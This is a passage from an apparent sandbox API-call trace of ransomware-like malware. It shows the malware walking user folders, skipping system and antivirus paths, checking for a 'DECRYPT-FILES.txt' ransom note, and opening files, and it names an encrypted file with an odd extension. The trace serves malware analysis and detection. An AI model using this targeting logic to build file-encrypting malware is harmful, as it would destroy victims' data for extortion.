(hObject=0x25c) returned 1 [0185.407] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.407] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7088860, ftCreationTime.dwHighDateTime=0x1d547b2, ftLastAccessTime.dwLowDateTime=0x4b046950, ftLastAccessTime.dwHighDateTime=0x1d5158d, ftLastWriteTime.dwLowDateTime=0xaed187e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x705e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xMaUz.pptx.bnLNf", cAlternateFileName="XMAUZP~1.BNL")) returned 0 [0185.407] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0185.407] CloseHandle (hObject=0x254) returned 1 [0185.408] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaed3e940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed3e940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0185.408] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0185.408] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0185.408] lstrcatW (in: lpString1="Downloads", lpString2="\\" | out: lpString1="Downloads\\") returned="Downloads\\" [0185.408] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Downloads\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0185.408] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\Program Files") returned 0x0 [0185.408] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch=":\\Windows") returned 0x0 [0185.408] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\Games\\") returned 0x0 [0185.408] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.408] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.408] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.408] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.408] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.408] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\All Users") returned 0x0 [0185.408] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.408] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.408] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.408] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="AhnLab") returned 0x0 [0185.408] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.408] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned 40 [0185.408] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.408] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\\\0a16c9.tmp") returned 51 [0185.408] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0185.409] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned 40 [0185.409] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.409] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\\\DECRYPT-FILES.txt") returned 58 [0185.409] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.409] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned 40 [0185.409] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*" [0185.409] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1378440, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1378440, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0185.409] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.409] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1378440, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1378440, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.409] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.409] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.409] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1378440, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf1378440, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1378440, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.409] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.409] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.409] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.409] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.409] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.409] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.409] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.409] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.409] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.409] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.410] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.410] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.410] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.410] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.410] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.410] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned 40 [0185.410] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.410] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0185.410] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\0a16c9.tmp" [0185.410] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.410] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.410] CloseHandle (hObject=0x0) returned 0 [0185.410] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.410] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed3e940, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaed3e940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed3e940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.410] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.410] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0185.410] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0185.410] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0185.410] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0185.410] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0185.411] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0185.411] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0185.411] CloseHandle (hObject=0x254) returned 1 [0185.411] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaed64aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed64aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0185.411] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0185.411] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0185.411] lstrcatW (in: lpString1="Favorites", lpString2="\\" | out: lpString1="Favorites\\") returned="Favorites\\" [0185.411] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Favorites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0185.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\Program Files") returned 0x0 [0185.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch=":\\Windows") returned 0x0 [0185.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\Games\\") returned 0x0 [0185.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\All Users") returned 0x0 [0185.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="AhnLab") returned 0x0 [0185.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.411] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned 40 [0185.411] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.411] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\\\0a16c9.tmp") returned 51 [0185.411] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0185.412] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned 40 [0185.412] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.412] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\\\DECRYPT-FILES.txt") returned 58 [0185.412] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.412] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned 40 [0185.412] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" [0185.412] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1378440, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1378440, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0185.412] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.412] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1378440, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1378440, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.412] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.412] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.412] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1378440, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf1378440, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1378440, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.412] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.412] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.412] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.412] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.412] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.412] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.413] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.413] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.413] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.413] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.413] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.413] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.413] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.413] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.413] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.413] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned 40 [0185.413] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.413] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0185.413] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\0a16c9.tmp" [0185.413] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.413] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.413] CloseHandle (hObject=0x0) returned 0 [0185.413] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.413] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed64aa0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaed64aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed64aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.414] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.414] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0185.414] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0185.414] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0185.414] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0185.414] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0185.414] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaedfd020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaedfd020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0185.414] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0185.414] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0185.414] lstrcatW (in: lpString1="Links", lpString2="\\" | out: lpString1="Links\\") returned="Links\\" [0185.414] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0185.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\Program Files") returned 0x0 [0185.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch=":\\Windows") returned 0x0 [0185.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\Games\\") returned 0x0 [0185.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\All Users") returned 0x0 [0185.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="AhnLab") returned 0x0 [0185.414] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.414] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 46 [0185.414] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.414] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\\\0a16c9.tmp") returned 57 [0185.415] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, 